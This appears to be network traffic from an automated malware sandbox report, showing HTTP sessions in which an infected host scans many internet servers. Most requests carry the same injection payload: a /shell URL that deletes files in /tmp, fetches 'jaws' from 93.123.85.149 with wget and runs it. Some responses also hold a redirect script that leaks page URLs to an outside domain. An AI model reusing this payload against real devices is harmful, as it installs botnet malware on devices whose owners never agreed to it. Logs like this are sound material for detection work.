                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            12192.168.2.2347338121.126.118.10280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:01.582990885 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:01.870906115 CET511INHTTP/1.1 302 Moved Temporarily
                                                            Date: Fri, 26 Jan 2024 14:31:00 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 138
                                                            Connection: close
                                                            Server: Nginx
                                                            Expires: 0
                                                            Pragma: no-cache
                                                            Cache-Control: no-cache
                                                            X-LANG: 1
                                                            X-Timezone: 0900
                                                            X-Timestamp: 1706279460
                                                            X-Arch: x86
                                                            X-Sysbit: x64
                                                            X-Enterprise: 0
                                                            X-Support-i18n: 0
                                                            X-Support-wifi: 0
                                                            Location: /login
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>Nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            13192.168.2.235711235.247.250.10980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:01.808664083 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:02.032819986 CET338INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Fri, 26 Jan 2024 14:31:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            14192.168.2.2348266108.156.62.15780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:04.249083042 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:04.455526114 CET316INHTTP/1.1 403 Forbidden
                                                            Server: CloudFront
                                                            Date: Fri, 26 Jan 2024 14:31:04 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 151
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            15192.168.2.236093279.132.142.4580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:04.250546932 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:04.460028887 CET452INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Fri, 26 Jan 2024 14:31:04 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 178
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            16192.168.2.2345198217.73.134.19780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:04.288933992 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            17192.168.2.2345580154.36.194.2480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:04.373179913 CET576INHTTP/1.0 200 OK
                                                            Connection: close
                                                            Cache-Control: max-age=259200
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Length: 435
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 74 65 65 6e 2e 69 6a 74 68 75 65 7a 76 30 36 2e 63 6f 6d 3a 34 35 31 31 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://canteen.ijthuezv06.com:4511/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            18192.168.2.2345590154.36.194.2480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:04.538665056 CET576INHTTP/1.0 200 OK
                                                            Connection: close
                                                            Cache-Control: max-age=259200
                                                            Content-Type: text/html;charset=utf-8
                                                            Content-Length: 435
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 74 65 65 6e 2e 69 6a 74 68 75 65 7a 76 30 36 2e 63 6f 6d 3a 34 35 31 31 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://canteen.ijthuezv06.com:4511/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            19192.168.2.235916093.213.121.25480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:04.539128065 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            20192.168.2.235924652.142.126.8880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:04.732286930 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            21192.168.2.2347940190.166.87.16780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:12.177184105 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:12.320910931 CET316INHTTP/1.1 200 OK
                                                            Content-Type:text/html; charset=UTF-8
                                                            Pragma:no-cache
                                                            Cache-control:no-cache, no-store, max-age=0
                                                            Transfer-Encoding:chunked
                                                            X-Frame-Options:SAMEORIGIN
                                                            Connection:Keep-Alive
                                                            X-XSS-Protection:1; mode=block
                                                            Content-Security-Policy:default-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                            Jan 26, 2024 15:31:12.321513891 CET1286INData Raw: 64 33 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33
                                                            Data Ascii: d38<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=ut
                                                            Jan 26, 2024 15:31:12.321537018 CET1286INData Raw: 31 29 20 3d 3d 20 27 3a 27 29 29 0d 0a 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 7d 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 4c 69 73 74 20 3d 20 41 64 64 72 65 73 73 2e 73 70 6c
                                                            Data Ascii: 1) == ':')) { return false; } List = Address.split(":"); if (List.length > 8) { return false; } for (var i = 0; i < List.length; i++) { if (false == IsIPv6AddressUs
                                                            Jan 26, 2024 15:31:12.321943045 CET860INData Raw: 0a 65 6c 73 65 0d 0a 7b 0d 0a 76 61 72 20 4c 69 73 74 20 3d 20 48 6f 73 74 49 6e 66 6f 2e 73 70 6c 69 74 28 22 3a 22 29 3b 0d 0a 69 66 28 4c 69 73 74 2e 6c 65 6e 67 74 68 20 3e 3d 20 33 29 0d 0a 7b 0d 0a 2f 2a 20 69 6e 63 6c 75 64 65 20 74 77 6f
                                                            Data Ascii: else{var List = HostInfo.split(":");if(List.length >= 3){/* include two or more than two ":" */if(true == IsIPv6AddressValid(HostInfo)){/* host string not include port */window.location="https://[" + HostInfo + "]:" + SSLPor


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            22192.168.2.23381342.21.165.21980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:12.259896040 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:12.481414080 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:12 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:12 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 65 31 38 30 35 39 37 26 23 34 36 3b 31 37 30 36 32 37 39 34 37 32 26 23 34 36 3b 31 34 35 32 34 62 31 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ae180597&#46;1706279472&#46;14524b11</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            23192.168.2.2358814121.144.178.3180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:12.317058086 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:13.769937038 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:14.048459053 CET414INHTTP/1.1 302 Moved Temporarily
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 138
                                                            Location: http://127.0.0.1/?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=20
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            24192.168.2.2359674167.114.61.3980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:12.402678967 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:12.546781063 CET334INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.4.1
                                                            Date: Fri, 26 Jan 2024 14:31:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 168
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.4.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            25192.168.2.2337802149.202.117.7680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:12.472984076 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:12.686064005 CET508INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:12 GMT
                                                            Server: Apache/2.4.38 (Debian)
                                                            Content-Length: 314
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 69 74 63 2d 66 74 70 2e 73 72 76 2e 6f 62 69 63 6f 72 70 2e 66 72 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at itc-ftp.srv.obicorp.fr Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            26192.168.2.235837423.235.205.3880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:12.588509083 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:12.704345942 CET1286INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:12 GMT
                                                            Server: Apache
                                                            Accept-Ranges: bytes
                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: 0
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 